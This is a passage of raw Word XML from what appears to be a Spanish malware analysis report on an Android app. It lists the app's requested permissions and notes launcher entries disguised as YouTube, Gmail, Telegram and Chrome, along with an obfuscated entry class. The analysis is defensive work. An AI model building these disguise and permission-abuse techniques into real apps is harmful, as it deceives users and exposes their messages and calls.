          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46F2ADDF" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Permite el escaneo de dispositivos Bluetooth </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="0ED8BEDA" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B1D5CF1" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>READ_PHONE_STATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4083797E" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la lectura de información de red telefónica y el estatus de llamadas activas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="4A6DDD31" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C1E7023" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>POST_NOTIFICATIONS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26C0B85F" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la creación de notificaciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="657374EC" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73CB81FB" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>WRITE_CONTACTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61466A93" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la escritura de información en los contactos del usuario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="356A8BAA" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="195974AD" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>BLUETOOTH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17DDDCC1" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la conexión a dispositivos Bluetooth cercanos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="43113DC1" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="537CD166" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>MODIFY_PHONE_STATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="767A0B52" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite realizar cambios al estado de telefonía del dispositivo (desactivación, cambios en el código MMI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="3773840A" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="077ADD6C" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>CAMERA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F8D3694" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite el acceso a la cámara del dispositivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="420534CA" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="659D36EB" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>SEND_SMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B50B38E" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite el envío de mensajes SMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="35E2DF30" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CC6F9EE" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>RECEIVE_SMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="586F036A" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la recepción de mensajes SMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="002D6461" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B98FA92" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>READ_SMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16D18D7B" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la lectura de mensajes SMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="6ABDA2BA" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="687095A8" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>READ_PHONE_NUMBERS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="422A459E" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite el acceso a los números de teléfono del dispositivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="2ED3B92E" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08189BBB" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="987"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>WAKE_LOCK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="331B0676" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite el acceso al PowerManager del sistema, encargado de mantener el procesador activo o la pantalla encendida</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="27128BD4" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B73EB29" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="987"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>LOCK_DEVICE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79114860" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite el bloqueo del dispositivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="36EF1EE9" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D8B0EB9" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>INTERNET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AC0865B" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la apertura de sockets de red por parte de la aplicación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="563CA1A6" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E819FEC" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>CALL_PHONE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DE0DAF5" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Permite el inicio de una llamada telefónica sin pasar por la interfaz </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>de llamada estándar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="008EFFFF" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F12436E" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>SYSTEM_ALERT_WINDOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AB1C2E8" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la creación de superposiciones en todas las aplicaciones con el modelo de interacciones utilizado por las interacciones del sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08FF9895" w14:textId="43F574F6" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="508D2F6C" w14:textId="41F2242D" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001248D1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Podemos observar que la aplicación solicita una gran cantidad de permisos que pertenecen a categorías muy diferentes, además de algunos que están categorizados como permisos con nivel de peligro en cuanto a su protección por parte de las recomendaciones de Google, como </w:t>
      </w:r>
      <w:r w:rsidRPr="002D52D8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ACCESS_FINE_LOCATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002D52D8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>READ_SMS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r w:rsidRPr="002D52D8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CALL_PHONE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5361166A" w14:textId="69A6312D" w:rsidR="00337CE1" w:rsidRPr="00267985" w:rsidRDefault="000C1FC5" w:rsidP="001248D1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Trebuchet MS"/>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="0F65C4FB">
          <v:shape id="_x0000_s2070" type="#_x0000_t75" alt="A logo of a google chrome&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:176.6pt;margin-top:381.2pt;width:81.4pt;height:81.05pt;z-index:30;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43" o:title="A logo of a google chrome&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00337CE1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Además de la información de permisos, del manifiesto XML también podemos encontrar el punto de entrada de la aplicación, que en Android se indica con la acción principal (</w:t>
      </w:r>
      <w:r w:rsidR="00337CE1" w:rsidRPr="00AB1C52">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>android.intent.action.MAIN</w:t>
      </w:r>
      <w:r w:rsidR="00337CE1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>) y la categoría LAUNCHER. En este caso existen múltiples puntos de entrada registrados, que hacen referencia a diferentes aplicaciones populares como YouTube, Gmail o Telegram. Sin embargo, todas estas entradas están desactivadas menos una, que carga dinámicamente el nombre de la aplicación, y registra la actividad de la clase “</w:t>
      </w:r>
      <w:r w:rsidR="00337CE1" w:rsidRPr="00AB1C52">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Xk011b72bcbf5396b4f9ec9737b706f44.Xkfb2bcfa7ae858b5247a4fc3c5ae3020.Xk1b4219fb6ddeebbcfdc5d80780f8b2f.Xk7d4258c1c9c337733fb3a8c3aaf570e</w:t>
      </w:r>
      <w:r w:rsidR="00337CE1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>” como la inicial</w:t>
      </w:r>
      <w:r w:rsidR="00AD7595">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la aplicación</w:t>
      </w:r>
      <w:r w:rsidR="00337CE1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Dado el nombre de la clase declarado, parece que el código de la aplicación podría estar ofuscado o que realiza una carga dinámica de otras clases durante la ejecución.</w:t>
      </w:r>
      <w:r w:rsidR="00E20DD6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Como detalle adicional de esta entrada activada, el </w:t>
      </w:r>
      <w:r w:rsidR="00267985">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">recurso al que hace referencia como icono </w:t>
      </w:r>
      <w:r w:rsidR="00C409B7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a través de</w:t>
      </w:r>
      <w:r w:rsidR="00267985">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la propiedad </w:t>
      </w:r>
      <w:r w:rsidR="00267985" w:rsidRPr="00267985">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>android:roundIcon=”@mipmap/ic_launcher”</w:t>
      </w:r>
      <w:r w:rsidR="00267985">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00267985">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se trata de un archivo</w:t>
      </w:r>
      <w:r w:rsidR="00DD6BEE">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de imagen con extensión PNG que representa el icono del navegador Google </w:t>
      </w:r>
      <w:r w:rsidR="00CF6568">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Chrome, mostrado a continuación</w:t>
      </w:r>
      <w:r w:rsidR="00DD6BEE">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA5D060" w14:textId="7351E390" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C0D7496" w14:textId="36FDC005" w:rsidR="00631F78" w:rsidRDefault="00631F78" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
